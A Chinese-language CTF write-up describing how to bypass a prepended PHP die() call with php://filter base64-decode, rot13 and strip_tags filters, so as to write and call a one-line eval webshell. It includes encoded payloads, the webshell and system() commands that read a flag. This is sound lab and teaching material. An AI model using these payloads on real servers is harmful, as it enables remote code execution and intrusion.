目录
方法1:php://filter 流的 base64-decode 方法
方法2:通过 rot13 编码实现绕过
除了替换,新增 file_put_contents 函数,将会往 $file 里写入 <?php die('大佬别秀了');?> 和我们 post 传入的 $content 内容。
由于 $content 参数可控,因此我们可以写入恶意的 php 代码或者一句话木马,但是 <?php die('大佬别秀了');?> 这段 PHP 代码它会立即终止脚本执行并输出消息 "大佬别秀了",因此我们还需要绕过这个 die() 函数。
方法1:php://filter 流的 base64-decode 方法
Base64 编码仅包含 64 个可打印字符,即 A-Z、a-z、0-9、+ 和 /。在 PHP 中,当使用 base64_decode 函数解码一个字符串时,如果字符串中包含不在 Base64 字符集中的字符,这些字符将被跳过,只解码合法的 Base64 字符。
在解码 Base64 字符串之前先移除所有非法字符示例:
<?php
// 从 GET 请求中获取 'txt' 参数,并移除所有非法字符
$_GET['txt'] = preg_replace('|[^a-z0-9A-Z+/]|s', '', $_GET['txt']);
// 解码清理后的 Base64 字符串
$decoded = base64_decode($_GET['txt']);
// 输出解码后的字符串
echo $decoded;
题目中 $content 被加上了 <?php die('大佬别秀了');?> ,我们可以使用 php://filter/write=convert.base64-decode 先对其进行解码,在解码过程中,字符 <、?、空格、(、'、)、;、>,这些字符不符合 base64 编码的字符范围都将先被移除,最终剩下的用于解码的字符只有 phpdie 和我们 post 传入的内容。
由于 Base64 解码是以 4 个字符为一组进行的,这里移除后只剩下 6 个字符,因此我们随便加两个合法字符补全,让其 base64 解码成功,后面再继续传入经过 base64 编码的 payload,也可以被正常解码。
这里 url 传入的内容本身会进行一次 url 解码,题目中还使用了一个 urldecode 函数,因此 file 传入的内容需要先经过两次 url 编码再传入。
file 传入 php://filter/write=convert.base64-decode/resource=shell.php
进行两次 url 编码:
我在网上找了一些在线网站或者使用 urlencode() 函数都不会对字母进行 url 编码
因此这里使用 hackbar 来编码的,或者使用 burpsuite 也可以
我们不难看出,url 编码其实就是字符的十六进制前面加了个百分号
两次 url 编码后的 payload:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%36%35%25%36%63%25%36%63%25%32%65%25%37%30%25%36%38%25%37%30
对 webshell 进行 base64 编码:
注意我们还需要加两个合法字符让前面 base64 解码成功,这里多传入两个1。
post 传入:
content=11PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==
调用 shell.php
/shell.php?cmd=system('ls');
读取 flag:
/shell.php?cmd=system('tac fl0g.php');
拿到 flag:ctfshow{c7a95f32-b6d9-4a59-b8e7-c385684ce860}
方法2:通过 rot13 编码实现绕过
<?php die('大佬别秀了');?> 经过 rot13 编码会变成 <?cuc qrv(); ?>,如果 php 未开启短标签,则不会认识这段代码,也就不会执行。
file 传入 php://filter/write=string.rot13/resource=sh.php
两次 url 编码:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%32%25%36%66%25%37%34%25%33%31%25%33%33%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%37%33%25%36%38%25%32%65%25%37%30%25%36%38%25%37%30
将一句话木马进行 rot13 解码后传入
content=<?cuc @riny($_TRG['pzq']);?>
该内容经过 rot13 编码就会变回正常的一句话木马
之后访问 sh.php,调用木马:
/sh.php?cmd=system('ls');
该方法也是可以读取到 flag 的:
/sh.php?cmd=system('tac fl0g.php');
我们可以来看一下 sh.php 的内容:
前面短标签的 php 代码 <?cuc qvr('大佬别秀了');?> 无法被识别,但是后面的 <?php @eval($_GET['cmd']);?> 可以正常执行,总的来说这种方法适用于未开启短标签的情况。
方法3:通过 strip_tags 函数去除 XML 标签
<?php die(); ?> 实际上就是一个 XML 标签,我们可以通过 strip_tags 函数去除它。
但是我们传入的一句话木马也是 XML 标签,如何让它只去除 <?php die(); ?> 而不破坏我们传入的木马呢?我们可以先对一句话木马进行 base64 编码后传入,这样就不会受到 strip_tags 函数的影响,当去除掉 <?php die(); ?> 后,由于 php://filter 允许使用多个过滤器,我们再调用 base64-decode 将一句话木马进行 base64 解码,实现还原。
post 传入 base64 编码的一句话木马:
content=PD9waHAgQGV2YWwoJF9HRVRbJ2NtZCddKTs/Pg==
file 传入 php://filter/read=string.strip_tags|convert.base64-decode/resource=hack.php
两次 url 编码:
?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%32%25%36%35%25%36%31%25%36%34%25%33%64%25%37%33%25%37%34%25%37%32%25%36%39%25%36%65%25%36%37%25%32%65%25%37%33%25%37%34%25%37%32%25%36%39%25%37%30%25%35%66%25%37%34%25%36%31%25%36%37%25%37%33%25%37%63%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%36%31%25%32%65%25%37%30%25%36%38%25%37%30
报错:
Deprecated: file_put_contents(): The string.strip_tags filter is deprecated in /var/www/html/index.php on line 21
当前的 PHP 版本中 string.strip_tags 过滤器已被弃用
看了下 hack.php 的内容:
是 base64 编码的一句话木马,很奇怪,我原本以为第一个过滤器执行失败了,但是这里没有看到 <?php die(); ?> ,说明 string.strip_tags 过滤器执行成功了,但 convert.base64-decode 过滤器未成功执行。
不太清楚是什么原因,知道的师傅可以解释一下谢谢。